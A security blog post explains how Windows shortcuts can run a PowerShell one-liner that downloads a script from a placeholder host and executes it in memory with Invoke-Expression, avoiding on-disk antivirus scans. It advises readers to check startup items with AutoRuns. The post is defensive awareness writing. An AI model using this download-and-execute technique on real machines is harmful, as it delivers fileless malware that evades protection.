Danger in shortcuts

Shortcuts, personally I never really use them. They link to a program slash file to run it or to make it easier to execute with arguments such as open minimized window. But I decided to give them a relook with the new Powershell program bundled in with all Windows installations and even released for Linux.


Shortcuts if you did not know can pass arguments into the program or file it has been linked to. Usually you use this if for example you want to configure a program to launch silently using lets say a -silent flag. Well just add that into the shortcut and it will launch with that argument without having to open a shell. So what about Powershell? Well it has a interesting flag called "-Command".

The command flag allows you to pass a command or potentially even an entire script into the Powershell process that will be started. Interestingly this means an entire script can run in memory without being stored on disk at all, the most insane version of anti-malware avoidance. Now depending on how this script is loaded, it could be scanned such as if the payload is encoded into Base64 then passed into the command flag. In that case the entire script is stored in the shortcut, and thus stored on disk so can be analyzed.

So how could we make this file-less? Powershell has a command to request web servers, it is called Invoke-WebRequest. Using this you can download data from a web URL and save it into a variable. Powershell also gives us access to a cmdlet to invoke strings as commands called Invoke-Expression.

So lets put it together;

powershell -Command "Invoke-WebRequest https://myvirus.com/payload.ps1 | Invoke-Expression"

Let me explain what this command does, first the "powershell" obviously invokes powershell.exe

Second "-Command" tells Powershell that we are about to pass it a command

Finally the string of the full command

So what does the command do? As I explained above Invoke-WebRequest will connect to https://myvirus.com/payload.ps1. This server would be hosting a Powershell script as shown here, the contexts of payload.ps1 are then piped into Invoke-Expression which again executes any code it is given essentially acting as another command flag. Now the script in payload.ps1 is running in memory without ever being stored on disk.

So what does this have to do with shortcuts? Well if we put this command inside a shortcut that means when the shortcut is clicked on, our little payload.ps1 would automatically be downloaded and invoked and because none of the code is stored in the shortcut you now have file-less Powershell code running in memory. This will make it almost impossible for any anti-malware software to scan the running code. The only thing it can scan is that command mentioned above. Now luckily most anti-malware software blocks Invoke-Expression and will detect it as a threat and stop the initial execution, however new ways to obfuscate Powershell commands come out all the time.

Example of a FilelessPayload.ps1 running from a shortcut

So watch what your running even shortcuts can pose a threat and potentially even a greater one that your normal dot exe malware. This type of attack can also be placed in any tool that executes commands such as Task Scheduler, batch files, or registry entry's so if you ever see Powershell or CMD in your included startup items make sure to remove them and reboot ASAP. If you want to check your list of startup items, check out AutoRuns ( https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns ), a great program made by Microsoft that will show you every program that will start with windows including its flags making it easy to check if something like this got installed on your machine.

Comments

Post a Comment

Popular posts from this blog

What does your VPN really do to your web traffic? (a deep dive into HTTPS)

Image
We have all seen the ads, right? If you have not, I would question how you are reading this article while turning your butter but anyway, let’s talk about VPNs (this is going to be spicy). I know we have also all heard about the "benefits" of using a VPN, such as "privacy", "security", and using that sketchy Wi-Fi that showed up while you were at the strip. So why don't we talk about what it does shall we?  First "privacy". Now yes, it might improve it to a point at least by masking your IP however there are so many other ways that you are tracked online that are not your IP that the benefit would be very little. For example, your browser dimensions, cookies, installed extensions, etc. These are all sent through the VPN and allow the service at the other end to identify you through the VPN anyway, and another point I made add. What do most people do with their VPN? I would say use services online, and what do most services have? A login! You’...
Read more

Keeping your AV enabled and not extracting the ZIP

Image
Public Service  Announcement This is something I wanted to write a post about as it seems to still be getting lots of hits and fooling lots of people. I will wright the TLDR here so you can get the message now and read further if you want to learn more. If ANY program EVER tells you to disable your Anti-Malware solution PROCEED WITH EXTREAM CAUTION.  If you are ever provided with a password protected archive again PROCEED WITH EXTREAM CAUTION. Now that the TLDR is out of the way let me explain. There have been many campaigns that have been involving something in common, using a password protected zip file hosted with a page that contains both the password AND instructions to disable your Anti-Malware solution. The ZIP file then contains infected files usually Redline or alike however if the person follows the instructions as provided they would have disabled their Anti-Malware solution which would now not detect the sample. This is a common tactic used to distribute malware on...
Read more